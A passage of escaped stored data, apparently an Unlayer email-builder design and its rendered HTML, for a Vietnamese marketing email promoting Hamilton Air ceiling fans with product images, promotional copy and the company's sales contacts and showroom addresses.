h\\u00e0ng<\\/span>\\\",\\\"calculatedWidth\\\":147,\\\"calculatedHeight\\\":37}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_3\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"#ecf0f1\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_3\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"04gNugS9ys\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"2mvPoFJCm5\\\",\\\"contents\\\":[{\\\"id\\\":\\\"U54rwmEkOc\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"13px 40px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"19px\\\",\\\"color\\\":\\\"#000000\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_5\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">T\\u1ed5ng \\u0111\\u00e0i b\\u00e1n h\\u00e0ng: 028.73033369<br \\/>EMAIL: sale@hogiaphat.vn\\u00a0<br \\/>SR Th\\u1ee7 \\u0110\\u1ee9c: 184 Tr\\u1ea7n L\\u1ef1u, An Ph\\u00fa, Tp Th\\u1ee7 \\u0110\\u1ee9c, Tp HCM<\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">SR Qu\\u1eadn 7: Happy Valley, 812 Nguy\\u1ec5n V\\u0103n Linh, T\\u00e2n Phong, Qu\\u1eadn 7, Tp HCM<\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"N9ssy1A_Ok\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"15px 40px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#000000\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_6\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 16.8px;\\\\\\\">\\u00a9Hamiton Air Fans\\u2122. All Rights Reserved.<\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 16.8px;\\\\\\\">C\\u00d4NG TY C\\u1ed4 PH\\u1ea6N C\\u00d4NG NGH\\u1ec6 HAMILTON AIR<br \\/>MST: 0315778682 do s\\u1edf KH v\\u00e0 \\u0111\\u1ea7u t\\u01b0 Tp.HCM.\\u00a0<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_6\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"#ecf0f1\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#272362\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_5\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}}],\\\"values\\\":{\\\"popupPosition\\\":\\\"center\\\",\\\"popupWidth\\\":\\\"600px\\\",\\\"popupHeight\\\":\\\"auto\\\",\\\"borderRadius\\\":\\\"10px\\\",\\\"contentAlign\\\":\\\"center\\\",\\\"contentVerticalAlign\\\":\\\"center\\\",\\\"contentWidth\\\":800,\\\"fontFamily\\\":{\\\"label\\\":\\\"Helvetica\\\",\\\"value\\\":\\\"helvetica,sans-serif\\\",\\\"url\\\":\\\"\\\",\\\"defaultFont\\\":true},\\\"fontWeight\\\":400,\\\"textColor\\\":\\\"#000000\\\",\\\"popupBackgroundColor\\\":\\\"#FFFFFF\\\",\\\"popupBackgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"cover\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"popupOverlay_backgroundColor\\\":\\\"rgba(0, 0, 0, 0.1)\\\",\\\"popupCloseButton_position\\\":\\\"top-right\\\",\\\"popupCloseButton_backgroundColor\\\":\\\"#DDDDDD\\\",\\\"popupCloseButton_iconColor\\\":\\\"#000000\\\",\\\"popupCloseButton_borderRadius\\\":\\\"0px\\\",\\\"popupCloseButton_margin\\\":\\\"0px\\\",\\\"popupCloseButton_action\\\":{\\\"name\\\":\\\"close_popup\\\",\\\"attrs\\\":{\\\"onClick\\\":\\\"document.querySelector(\'.u-popup-container\').style.display = \'none\';\\\"}},\\\"backgroundColor\\\":\\\"#ffffff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"preheaderText\\\":\\\"\\\",\\\"linkStyle\\\":{\\\"body\\\":true,\\\"linkColor\\\":\\\"#683d0d\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":false,\\\"linkHoverUnderline\\\":true,\\\"inherit\\\":false},\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_body\\\",\\\"htmlClassNames\\\":\\\"u_body\\\"}}},\\\"schemaVersion\\\":13}\"', '\"<!DOCTYPE HTML PUBLIC \\\"-\\/\\/W3C\\/\\/DTD XHTML 1.0 Transitional \\/\\/EN\\\" \\\"http:\\/\\/www.w3.org\\/TR\\/xhtml1\\/DTD\\/xhtml1-transitional.dtd\\\">\\r\\n<html xmlns=\\\"http:\\/\\/www.w3.org\\/1999\\/xhtml\\\" xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:o=\\\"urn:schemas-microsoft-com:office:office\\\">\\r\\n<head>\\r\\n<!--[if gte mso 9]>\\r\\n<xml>\\r\\n  <o:OfficeDocumentSettings>\\r\\n    <o:AllowPNG\\/>\\r\\n    <o:PixelsPerInch>96<\\/o:PixelsPerInch>\\r\\n  <\\/o:OfficeDocumentSettings>\\r\\n<\\/xml>\\r\\n<![endif]-->\\r\\n  <meta http-equiv=\\\"Content-Type\\\" content=\\\"text\\/html; charset=UTF-8\\\">\\r\\n  <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\">\\r\\n  <meta name=\\\"x-apple-disable-message-reformatting\\\">\\r\\n  <!--[if !mso]><!--><meta http-equiv=\\\"X-UA-Compatible\\\" content=\\\"IE=edge\\\"><!--<![endif]-->\\r\\n  <title><\\/title>\\r\\n  \\r\\n    <style type=\\\"text\\/css\\\">\\r\\n      @media only screen and (min-width: 820px) {\\r\\n  .u-row {\\r\\n    width: 800px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    vertical-align: top;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-50 {\\r\\n    width: 400px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-100 {\\r\\n    width: 800px !important;\\r\\n  }\\r\\n\\r\\n}\\r\\n\\r\\n@media (max-width: 820px) {\\r\\n  .u-row-container {\\r\\n    max-width: 100% !important;\\r\\n    padding-left: 0px !important;\\r\\n    padding-right: 0px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    min-width: 320px !important;\\r\\n    max-width: 100% !important;\\r\\n    display: block !important;\\r\\n  }\\r\\n  .u-row {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col > div {\\r\\n    margin: 0 auto;\\r\\n  }\\r\\n}\\r\\na[x-apple-data-detectors=\'true\'] {\\r\\n  color: inherit !important;\\r\\n  text-decoration: none !important;\\r\\n}\\r\\n\\r\\n<\\/style>\\r\\n  \\r\\n  \\r\\n\\r\\n<\\/head>\\r\\n\\r\\n<body class=\\\"clean-body u_body\\\" style=\\\"margin: 0;padding: 0;-webkit-text-size-adjust: 100%;background-color: #ffffff;color: #000000\\\">\\r\\n  <!--[if IE]><div class=\\\"ie-container\\\"><![endif]-->\\r\\n  <!--[if mso]><div class=\\\"mso-container\\\"><![endif]-->\\r\\n  <table style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;min-width: 320px;Margin: 0 auto;background-color: #ffffff;width:100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\">\\r\\n  <tbody>\\r\\n  <tr style=\\\"vertical-align: top\\\">\\r\\n    <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n    <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td align=\\\"center\\\" style=\\\"background-color: #ffffff;\\\"><![endif]-->\\r\\n    \\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 800px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #0c6097;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:800px;\\\"><tr style=\\\"background-color: #0c6097;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"800\\\" style=\\\"background-color: #ecf0f1;width: 800px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 800px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:40px 10px 19px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      <a href=\\\"https:\\/\\/quattranvn.com\\/quat-tran-hamilton-air\\\" target=\\\"_blank\\\">\\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677921547793-log_hq.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 780px;\\\" width=\\\"780\\\"\\/>\\r\\n      <\\/a>\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      <a href=\\\"https:\\/\\/quattranvn.com\\/quat-tran-3-canh-onix-orb.html\\\" target=\\\"_blank\\\">\\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681267039274-quat-tran-3-canh-onix-orb.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 780px;\\\" width=\\\"780\\\"\\/>\\r\\n      <\\/a>\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 0px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-family: inherit; font-size: 18px; color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 18px; line-height: 23.8px; color: #000000;\\\"><strong>Qu\\u1ea1t tr\\u1ea7n HAMILTON AIR - Ki\\u1ec3u d\\u00e1ng th\\u1ee7 c\\u00f4ng - Tho\\u1ea3i m\\u00e1i s\\u00e1ng t\\u1ea1o<\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h3 style=\\\"margin: 0px; color: #000000; line-height: 130%; text-align: center; word-wrap: break-word; font-family: inherit; font-size: 20px; \\\">MANG \\u0110\\u1ebeN S\\u1ef0 TINH T\\u1ebe PHONG C\\u00c1CH CHO T\\u1eeaNG KH\\u00d4NG GIAN S\\u1ed0NG<\\/h3>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 800px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:800px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"800\\\" style=\\\"background-color: #ecf0f1;width: 800px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 800px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:20px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-family: inherit; font-size: 14px; line-height: 200%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 200%;\\\">Phong C\\u00e1ch - Sang Tr\\u1ecdng l\\u00e0 \\u0111i\\u1ec1u ki\\u1ec7n \\u0111ang \\u0111\\u01b0\\u1ee3c nhi\\u1ec1u \\u0111\\u01a1n v\\u1ecb thi\\u1ebft k\\u1ebf, nh\\u00e0 th\\u1ea7u, ch\\u1ee7 \\u0111\\u1ea7u t\\u01b0 l\\u1ef1a ch\\u1ecdn hi\\u1ec7n nay b\\u1edfi qu\\u1ea1t tr\\u1ea7n cho kh\\u00f4ng gian nh\\u00e0 \\u1edf.<\\/p>\\r\\n<p style=\\\"line-height: 200%;\\\">Trong quy tr\\u00ecnh s\\u1ea3n xu\\u1ea5t, \\u0111\\u1ec3 \\u0111\\u1ebfn \\u0111\\u01b0\\u1ee3c v\\u1edbi tay ng\\u01b0\\u1eddi ti\\u00eau d\\u00f9ng, nh\\u1eefng lo\\u1ea1i s\\u1ea3n ph\\u1ea9m c\\u1ee7a HAMILTON AIR ph\\u1ea3i tr\\u1ea3i qua ti\\u1ebfn tr\\u00ecnh s\\u1ea3n xu\\u1ea5t v\\u00e0 ki\\u1ec3m duy\\u1ec7t kh\\u1eaft khe. \\u0110i\\u1ec1u n\\u00e0y s\\u1ebd gi\\u00fap h\\u1ea1n ch\\u1ebf nh\\u1eefng r\\u1ee7i ro \\u0111\\u00e1ng ti\\u1ebfc trong quy tr\\u00ecnh s\\u1eed d\\u1ee5ng.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 800px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:800px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"400\\\" style=\\\"background-color: #ecf0f1;width: 400px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 400px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:28px 33px 13px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-family: inherit; color: #444444; line-height: 200%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 200%;\\\"><span style=\\\"font-size: 16px; line-height: 32px;\\\"><strong>S\\u1ea3n ph\\u1ea9m c\\u00f3 \\u0111\\u1ed9 b\\u1ec1n cao<\\/strong><\\/span><\\/p>\\r\\n<p style=\\\"line-height: 200%;\\\">\\u0110\\u1ed1i v\\u1edbi b\\u1ea5t k\\u1ec3 ng\\u01b0\\u1eddi ti\\u00eau d\\u00f9ng n\\u00e0o, y\\u1ebfu t\\u1ed1 \\u0111\\u1ed9 b\\u1ec1n lu\\u00f4n \\u0111\\u01b0\\u1ee3c ch\\u00fa tr\\u1ecdng. HAMILTON AIR th\\u1ef1c s\\u1ef1 \\u0111\\u00e3 mang \\u0111\\u1ebfn cho ng\\u01b0\\u1eddi mua m\\u1ed9t m\\u1eabu s\\u1ea3n ph\\u1ea9m v\\u01b0\\u1ee3t k\\u1ef3 v\\u1ecdng. S\\u1eed d\\u1ee5ng ch\\u1ea5t li\\u1ec7u c\\u00e1nh cao c\\u1ea5p, ch\\u1ed1ng cong v\\u00eanh, \\u0111\\u1ed9 b\\u1ec1n theo th\\u1eddi ti\\u1ebft.\\u00a0<\\/p>\\r\\n<p style=\\\"line-height: 200%;\\\">Tuy nhi\\u00ean ng\\u01b0\\u1eddi d\\u00f9ng c\\u0169ng n\\u00ean quan t\\u00e2m kh\\u00f4ng n\\u00ean b\\u1eadt qu\\u1ea1t nhi\\u1ec1u gi\\u1edd v\\u00e0 v\\u1ec7 sinh qu\\u1ea1t th\\u01b0\\u1eddng xuy\\u00ean \\u0111\\u1ec3 gi\\u00fap t\\u0103ng \\u0111\\u1ed9 b\\u1ec1n ch\\u1eafc cho s\\u1ea3n ph\\u1ea9m.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  